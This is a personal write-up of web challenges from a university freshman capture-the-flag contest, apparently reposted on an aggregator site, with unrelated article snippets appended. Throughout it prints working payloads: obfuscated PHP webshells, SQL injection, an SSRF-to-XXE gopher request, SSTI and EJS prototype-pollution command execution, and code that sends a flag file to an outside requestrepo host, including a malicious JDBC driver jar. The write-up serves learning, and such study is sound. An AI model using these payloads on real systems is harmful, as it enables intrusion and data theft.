【Web】SCU新生赛个人wp及完赛感想

目录

一些碎碎念:

Web Guideline

2048

ezupload

hardupload

ezphp

ezweb

ezsql

webbuilder

tarit

tarit_revenge

VipDinner

simplespi


一些碎碎念:

scu新生赛是我全心全力打的第二场比赛,历时七天,期间不免煎熬,有山重水复后仍疑无路的无能为力,有距离正解仅一念之隔的遗憾,当然,从不缺的是不断尝试最终打出flag的恣意。

回首看去,很多题对于现在的我极具启发性,比赛过程也极大的提升了我的信息检索能力(启蒙于技能兴鲁的经历)

作为3个月ctf生涯的一个阶段性检测,因为队里就我一人,所以自认最后的成绩还算可以(web12/15),给自己打个75分吧。

感谢401的师傅们出的高质量赛题,真就应了“题⽬难度梯度提升,在保证题⽬质量的同时,也有对新手循序渐进的引导”的主题。

期待下学期的校赛,希望在此之前能有破茧成蝶的蜕变!

 

下面直接贴出自己的wp

Web Guideline

查看器中直接看到flag(hidden)

2048

一眼前端js小游戏,常见的考点就是控制台改分

直接console里盲猜一个score,发现有定义

直接改分score=99999999999

然后快速把游戏玩死,弹窗拿到flag

 

ezupload

写马

<?=phpinfo()?>

<?=eval(hex2bin("6576616c28245f504f53545b22636d64225d293b"))?>

上传文件时后缀改为.PHP即可绕过后缀过滤

内容检测则用16进制转字符串来绕过

上传成功后看时间(看当前美国洛杉矶时间,缩小bp文件路径爆破范围)

<?php  

// 设置默认时区为美国洛杉矶  

date_default_timezone_set('America/Los_Angeles');  

// 输出当前时间  

echo date('H:i:s');  

?>

bp爆破出文件路径

直接访问rce拿到flag

hardupload

写马

<?=eval(next(getallheaders()))?>

getallheaders()返回所有的HTTP头信息,但是要注意的一点是这个函数返回的是一个数组,而eval()要求的参数是一个字符串,所以这里不能直接用,这时我们就要想办法将数组转换为字符串,这里再套个next就可以返回字符串

(end也行,但这里再添加hearders貌似不是最后一位,所以盲猜next直接指向UA)

上传时文件后缀改.PHP就可绕过后缀过滤

用下面脚本看一眼时间方便bp爆破上传路径

<?php  

// 设置默认时区为美国洛杉矶  

date_default_timezone_set('America/Los_Angeles');  

// 输出当前时间  

echo date('H:i:s');  

?>

直接访问在UA里rce即可拿到flag

ezphp

?name=123

访问/cache.php

 

?name=".file_put_contents('shell.php','<?php phpinfo();?>')."

访问/cache.php触发file_put_contents,回显18(符合执行成功的返回值)

 

访问/shell.php 

成功写入

?name=".file_put_contents('shell.php','<?php eval($_POST[1])?>')."

访问/cache.php触发file_put_contents,回显23,说明成功执行

 

访问/shell.php

连蚁剑拿flag

 

ezweb

主机存活检测,给了一个ip输入框

测试有无ssrf

baidu.com,成功跳转,猜测存在

查看页面源代码,还有一个xxe.php文件

看了下就是简单的xxe注入,但是限制死了必须是本地访问

 

现在思路就有了,利用主机存活检测的ssrf去对xxe.php发送请求

利用gopher协议构造:

gopher://127.0.0.1:80/_

POST /xxe.php HTTP/1.1

Host: 127.0.0.1

Content-Length: 180

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE info [  

<!ENTITY name SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"> ]>

<info>

<name>&name;

</name></info>

需要进行两次url编码

gopher://127.0.0.1:80/_%250D%250APOST%2520/xxe.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Length%253A%2520180%250D%250A%250D%250A%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522utf-8%2522%253F%253E%250D%250A%253C%2521DOCTYPE%2520info%2520%255B%2520%2520%250D%250A%253C%2521ENTITY%2520name%2520SYSTEM%2520%2522php%253A//filter/read%253Dconvert.base64-encode/resource%253D/flag%2522%253E%2520%255D%253E%2520%250D%250A%253Cinfo%253E%250D%250A%253Cname%253E%2526name%253B%250D%250A%253C/name%253E%253C/info%253E%250D%250A

尝试,直接hack,测了下,发现是127.0.0.1被禁用,直接0.0.0.0代替就行

gopher://0.0.0.0:80/_%250D%250APOST%2520/xxe.php%2520HTTP/1.1%250D%250AHost%253A%25200.0.0.0%250D%250AContent-Length%253A%2520180%250D%250A%250D%250A%253C%253Fxml%2520version%253D%25221.0%2522%2520encoding%253D%2522utf-8%2522%253F%253E%250D%250A%253C%2521DOCTYPE%2520info%2520%255B%2520%2520%250D%250A%253C%2521ENTITY%2520name%2520SYSTEM%2520%2522php%253A//filter/read%253Dconvert.base64-encode/resource%253D/flag%2522%253E%2520%255D%253E%2520%250D%250A%253Cinfo%253E%250D%250A%253Cname%253E%2526name%253B%250D%250A%253C/name%253E%253C/info%253E%250D%250A

最后将得到的base64解码即可

ezsql

简单测一测发现是数字型注入

可以直接联合查询,按正常的套路走

/index.php?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

//flag

?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="flag"

//flag,id

/index.php?id=1 union select 1,flag from ctf.flag

//where_is_flag

 

明显一个假的flag

sqlmap查了查别的库感觉没有特别明显的flag表

想到flag在某个存储过程的定义里面

已知flag格式为scuctf{uuid}

直接like模糊匹配

/index.php?id=-1 union select 1,routine_definition from information_schema.routines where routine_definition like '%scuctf%'

拿到flag

webbuilder

在服务器上起一个flask,源码如下

app.py源码

from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route('/test', methods=['GET'])
def test():
    name = request.args.get('name')

    # 检查是否提供了 name 参数
    if not name:
        return jsonify(error='Name parameter is missing.'), 400

    # 构建返回的 JSON 数据
    responseData = {
        'len': 15,
        'code': 200  # 获取当前时间戳
    }

    # 设置响应头的 Content-Type 为 application/json
    return jsonify(responseData)

@app.route('/redirect', methods=['GET'])
def redirect_route():
    # 返回状态码为 302 的响应
    return jsonify(), 302, {'Location': 'http://124.222.136.33:3000/success'}

@app.route('/success', methods=['GET'])
def success_route():
    # Additional logic for /success route if needed
    return 'Success Route'

# 新加的 /js 路由
@app.route('/js', methods=['GET'])
def js_route():
    return """
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>CSP with Nonce Example</title>
  <!-- 将生成的 nonce 值传递到前端脚本 -->
  <script>
    const nonce = 'XssFun';  // 这里替换为实际的 nonce
  </script>
  <!-- 在 script 标签中使用 nonce -->
  <script nonce="XssFun">
    // 在这里执行 JavaScript 代码,访问本地 /flag 路由并获取回显
    
    fetchData()
    
    // 定义获取数据的函数
    async function fetchData() {
      try {
        const response = await fetch('http://127.0.0.1:8080/flag');
        const data = await response.text();  // 使用 text() 获取字符串形式的响应
        location.href="http://0scpvdff.requestrepo.com/?data="+encodeURIComponent(data)
        

      

      } catch (error) {
        console.error('Error fetching data:', error);
      }
    }
    
  </script>
</head>
<body>
  <!-- 在此可以添加其他 HTML 内容 -->
</body>
</html>
    """

if __name__ == '__main__':
    app.run(host="0.0.0.0", port=3000)

因为api检测1那里长度为10-20的随机数,检测2还存在4次全部都是404的可能,所以需要多次爆破

 

 

拿到uuid

访问/report?uuid=xxx(触发bot.js里封装的visit,xss把flag带出)

拿到flag

 

 

tarit

题目就是tar文件上传,题目环境有个解包的过程,这个过程如果我们tar中有个软连接,就会链接到靶机文件

 

上传访问

 没找到flag文件在哪,读环境变量偷家成功

tarit_revenge

先随便上传一个tar文件,发现存在一个文件读取

经过尝试发现../替换成了空,双写绕过即可

 

访问/app.pyc看源码

因为没拿到pyc文件,无法反编译,只能靠猜了(

看出应该是渲染了index.html,可以覆盖index.html来渲染自己的py代码(SSTI)

 

贴出脚本

import requests as req
import tarfile


def changeFileName(filename):
    filename.name = '/app/templates/index.html'
    return filename


with tarfile.open("tar.tar", "w") as tar:
    tar.add('test.py', filter=changeFileName)


def upload():
    url = 'http://43.136.40.245:1389/upload'
    response = req.post(url=url, files={"file": open("tar.tar", 'rb')})
    print(response.text)


if __name__ == "__main__":
    upload()

 

test.py

{{config.__class__.__init__.__globals__['os'].popen('ls /').read()}}

//Y0u_C4nt_Find33333333_M3hhh

{{config.__class__.__init__.__globals__['os'].popen('ls /Y0u_C4nt_Find33333333_M3hhh').read()}}

//f144gggggg

{{config.__class__.__init__.__globals__['os'].popen('tac /Y0u_C4nt_Find33333333_M3hhh/f144gggggg').read()}}

//SCUCTF{S0rry_Ab0ut_Th3Th3_R3veng3_QwQ}

VipDinner

先给出参考文章

绕invited=1

MySQL 记录不存在插入 和 存在则更新_mysql 更新或新增-CSDN博客

绕vip

mysql注入之长字符截断、orderby注入、HTTP分割注入、limit注入_mysql注入 关键字截断查询原理预防-CSDN博客

ejsrce

EJS - Server Side Prototype Pollution gadgets to RCE | mizu.re

mysql注入之长字符截断、orderby注入、HTTP分割注入、limit注入_mysql注入 关键字截断查询原理预防-CSDN博客


首先是绕invited


 

在/login的signup界面先更改掉Alice的密码。把密码覆盖成abcd的md5值

Alice', 'awdaw')

ON DUPLICATE KEY UPDATE

  password = 'e2fc714c4727ee9395f324cd2e7f331f'#

输入Alice abcd即可登录拿到invited=1

接下来绕vip,

发现sql模式为空,data的容量是255

 

在note这里是可以拼接字符进去。但是vip是控不了的,肯定是false。可以在note插入大量字符串,因为数据表的data字段只能容纳255,那么后面vip等于false就会被截断掉 

 

接下来是ejsrce部分

显然finish调用了merge

/check调用了finish

 

/bill调用了res.render()

 

下面就是调payload(长度为255即可)

用这个网站计算字符串长度

在线文本字符数统计工具 - UU在线工具

最终payload:

{"ids":[10],"createTime":"2023-12-8","price":16,"note":"aa","__proto__":{"view

options":{"client":1,"escapeFunction":"(() => {});return

process.mainModule.require('child_process').execSync('cat

/flag').toString()"}},"vip":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}}

注意要给引号转义(让bp里识别成note的键值)

aa\",\"__proto__\":{\"view options\":{\"client\":1,\"escapeFunction\":\"(() =>

{});return process.mainModule.require('child_process').execSync('cat

/flag').toString()\"}},\"vip\":\"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"}

访问/check?order=1触发finish污染成功

访问/bill?order=1拿到flag 

simplespi

审计代码。代码没啥过滤的。就是一个上传jar包。和写了一个类似spi后门的东西。会加载我们的jar包

从SPI机制到JDBC后门实现 | CTF导航

加载的部分和上面文章的例子很像

关键就是生成一个和上面文章那个jar包结构相同的恶意jar包

 

最后新建的项目结构如图

 

MySQLDriver(抄文章代码,就改了个LinuxCmd)

package com;
import java.sql.*;
import java.util.*;
import java.util.logging.*;
public class MySQLDriver implements Driver {
    protected static boolean DEBUG = false;
    protected static final String WindowsCmd = "calc";
    protected static final String LinuxCmd = "curl 7s5ogi9m.requestrepo.com -T /flag";
    protected static String shell;
    protected static String args;
    protected static String cmd;
    static{
        if(DEBUG){
            Logger.getGlobal().info("Entered static JDBC driver initialization block, executing the payload...");
        }
        if( System.getProperty("os.name").toLowerCase().contains("windows") ){
            shell = "cmd.exe";
            args = "/c";
            cmd = WindowsCmd;
        } else {
            shell = "/bin/sh";
            args = "-c";
            cmd = LinuxCmd;
        }
        try{
            Runtime.getRuntime().exec(new String[] {shell, args, cmd});
        } catch(Exception ignored) {
        }
    }
    // JDBC methods below
    public boolean acceptsURL(String url){
        if(DEBUG){
            Logger.getGlobal().info("acceptsURL() called: "+url);
        }
        return false;
    }
    public Connection connect(String url, Properties info){
        if(DEBUG){
            Logger.getGlobal().info("connect() called: "+url);
        }
        return null;
    }
    public int getMajorVersion(){
        if(DEBUG){
            Logger.getGlobal().info("getMajorVersion() called");
        }
        return 1;
    }
    public int getMinorVersion(){
        if(DEBUG){
            Logger.getGlobal().info("getMajorVersion() called");
        }
        return 0;
    }
    public Logger getParentLogger(){
        if(DEBUG){
            Logger.getGlobal().info("getParentLogger() called");
        }
        return null;
    }
    public DriverPropertyInfo[] getPropertyInfo(String url, Properties info){
        if(DEBUG){
            Logger.getGlobal().info("getPropertyInfo() called: "+url);
        }
        return new DriverPropertyInfo[0];
    }
    public boolean jdbcCompliant(){
        if(DEBUG){
            Logger.getGlobal().info("jdbcCompliant() called");
        }
        return true;
    }
}

运行下面命令就会在当前目录生成恶意jar包

javac src/com/MySQLDriver.java

jar -cvf evil2.jar -C src/ .

上传evil2.jar

访问/init?name=evil2(审源码)

这时候就成功外带拿到flag 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/235096.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

[GPT]Andrej Karpathy微软Build大会GPT演讲(下)--该如何使用GPT助手

该如何使用GPT助手--将GPT助手模型应用于问题 现在我要换个方向,让我们看看如何最好地将 GPT 助手模型应用于您的问题。 现在我想在一个具体示例的场景里展示。让我们在这里使用一个具体示例。 假设你正在写一篇文章或一篇博客文章,你打算在最后写这句话。 加州的人口是阿拉…

[足式机器人]Part2 Dr. CAN学习笔记-自动控制原理Ch1-2稳定性分析Stability

本文仅供学习使用 本文参考&#xff1a; B站&#xff1a;DR_CAN Dr. CAN学习笔记-自动控制原理Ch1-2稳定性分析Stability 0. 序言1. 稳定的分类2. 稳定的对象3. 稳定的系统4. 系统稳定性的讨论5. 补充内容——Transfer Function(传递函数) - nonzero Initial Condition(非零初始…

C现代方法(第27章)笔记——C99对数学计算的新增支持

文章目录 第27章 C99对数学计算的新增支持27.1 <stdint.h>: 整数类型(C99)27.1.1 <stdint.h>类型27.1.2 对指定宽度整数类型的限制27.1.3 对其他整数类型的限制27.1.4 用于整型常量的宏 27.2 <inttype.h>: 整数类型的格式转换(C99)27.2.1 用于格式指定符的宏…

【设计模式--创建型--建造者模式】

建造者模式 建造者模式概述结构结果优缺点使用场景 将上述案例改为链式调用结果 建造者模式 概述 将一个复杂对象的构建与表示分离&#xff0c;使得同样的构建过程可以创建不同的表示。 分离了部件的构建&#xff08;由Builder来负责&#xff09;和装配&#xff08;由Direct…

接触刚性环境任务下的机器人力控(阻抗)性能测试

内涵 接触刚性环境任务下的机器人力控&#xff08;阻抗&#xff09;性能测试旨在评估机器人在与刚性物体交互时的性能表现。这种测试通过调整机器人的控制参数&#xff0c;如期望刚度和期望阻尼等&#xff0c;并分析记录的数据&#xff0c;旨在确保机器人能够在执行任务时保持…

类数组对象转为数组的方法

在开发的过程经常会遇到一些类数组对象&#xff0c;例如arguments&#xff0c;类数组对象具有length属性&#xff0c;也可以通过下标访问到对应值&#xff0c;但是不能使用数组的方法&#xff0c;如果将类数组对象转为数组&#xff0c;数组方法可以帮助我们更快实现逻辑&#x…

C++枚举类

枚举 C11有作用域枚举和无作用域枚举 无作用域枚举 特点 全局作用域&#xff1a;无作用域枚举的成员&#xff08;枚举值&#xff09;在包含它们的作用域内是直接可见的&#xff0c;不需要使用枚举类型名称作为前缀。 隐式类型转换&#xff1a;无作用域枚举的成员可以隐式地转换…

机器学习 | Python贝叶斯超参数优化模型答疑

机器学习 | Python贝叶斯超参数优化模型答疑 目录 机器学习 | Python贝叶斯超参数优化模型答疑问题汇总问题1答疑问题2答疑问题3答疑问题汇总 问题1:想问一下贝叶斯优化是什么? 问题2:为什么使用贝叶斯优化? 问题3:如何实现? 问题1答疑 超参数优化在大多数机器学习流水线…

ToolkenGPT:用大量工具增强LLM

深度学习自然语言处理 原创作者&#xff1a;cola 用外部工具增强大型语言模型(LLM)已经成为解决复杂问题的一种方法。然而&#xff0c;用样例数据对LLM进行微调的传统方法&#xff0c;可能既昂贵又局限于一组预定义的工具。最近的上下文学习范式缓解了这一问题&#xff0c;但有…

微信小程序pc端宽高:默认宽高为1024*812,全屏宽高为1920*1032

最近开发调试pc端小程序&#xff0c;想知道默认打开和全屏这两种情况下的小程序宽高&#xff0c;发现了一种方法&#xff1a; 真机运行pc端小程序&#xff0c;点击devTools 在控制台直接打印window对象&#xff0c;可以获取到pc端默认屏幕宽高为1024*812&#xff0c;全屏pc端小…

Go开发运维:Go服务发布到K8S集群

目录 一、实验 1.Go服务发布到k8s集群 二、问题 1.如何从Harbor拉取镜像 一、实验 1.Go服务发布到k8s集群 &#xff08;1&#xff09;linux机器安装go(基于CentOS 7系统) yum install go -y &#xff08;2&#xff09;查看版本 go version &#xff08;3&#xff09;创…

有病但合理的 ChatGPT 提示语

ChatGPT 面世一年多了&#xff0c;如何让大模型输出高质量内容&#xff0c;让提示词工程成了一门重要的学科。以下是一些有病但合理的提示词技巧&#xff0c;大部分经过论文证明&#xff0c;有效提高 ChatGPT 输出质量&#xff1a; ​1️⃣ Take a deep breath. 深呼吸 ✨ 作用…

【Kubernetes】持久化存储emptyDir/hostPath/nfs/PVC

k8s持久化存储 一、为什么做持久化存储&#xff1f;二、k8s持久化存储&#xff1a;emptyDir三、k8s持久化存储&#xff1a;hostPath四、k8s持久化存储&#xff1a;nfs4.1、搭建nfs服务4.2、挂载nfs共享目录 五、k8s持久化存储&#xff1a; PVC5.1、什么是PV5.2、什么是PVC5.3、…

ansible中的角色

1.理解roles在企业中的定位及写法 查看创建目录结构 ansible - galaxy list 指定新的位置 vim ansible.cfg roles_path ~/.ansible/roles 建立项目 cd roles/ ansible-galaxy init vsftpd tree vsftpd/ 编辑任务执行&#xff08;顺序&#xff09;文件 vim vsftpd/tas…

Day56力扣打卡

打卡记录 数对统计&#xff08;DP状态压缩&#xff09; 参考文献 #include <bits/stdc.h>using namespace std;void solve(){int n;cin >> n;map<int, int> mapp;vector<int> a(n);for (auto& x : a){cin >> x;mapp[x] ;}vector<array&…

C语言动态内存经典笔试题分析

C语言动态内存经典笔试题分析 文章目录 C语言动态内存经典笔试题分析1. 题目一2. 题目二3. 题目三4. 题目四 1. 题目一 void GetMemory(char *p){p (char *)malloc(100);} void Test(void){char *str NULL;GetMemory(str);strcpy(str, "hello world");printf(str)…

Mybatis与Spring结合深探——MapperFactoryBean的奥秘

文章目录 前言MapperFactoryBean的工作原理底层实现剖析MapperFactoryBean的checkDaoConfig()方法总结 MapperFactoryBean的getObject()方法 思考联想后续 系列相关相关文章究竟FactoryBean是什么&#xff1f;深入理解Spring的工厂神器超硬核解析Mybatis动态代理原理&#xff0…

transformer模型结构|李宏毅机器学习21年

来源&#xff1a;https://www.bilibili.com/video/BV1Bb4y1L7FT?p4&vd_sourcef66cebc7ed6819c67fca9b4fa3785d39 文章目录 概述seq2seqtransformerEncoderDecoderAutoregressive&#xff08;AT&#xff09;self-attention与masked-self attentionmodel如何决定输出的长度…

DL Homework 10

习题6-1P 推导RNN反向传播算法BPTT. 习题6-2 推导公式(6.40)和公式(6.41)中的梯度 习题6-3 当使用公式(6.50)作为循环神经网络的状态更新公式时&#xff0c; 分析其可能存在梯度爆炸的原因并给出解决方法&#xff0e; 当然&#xff0c;因为我数学比较菜&#xff0c;我看了好半…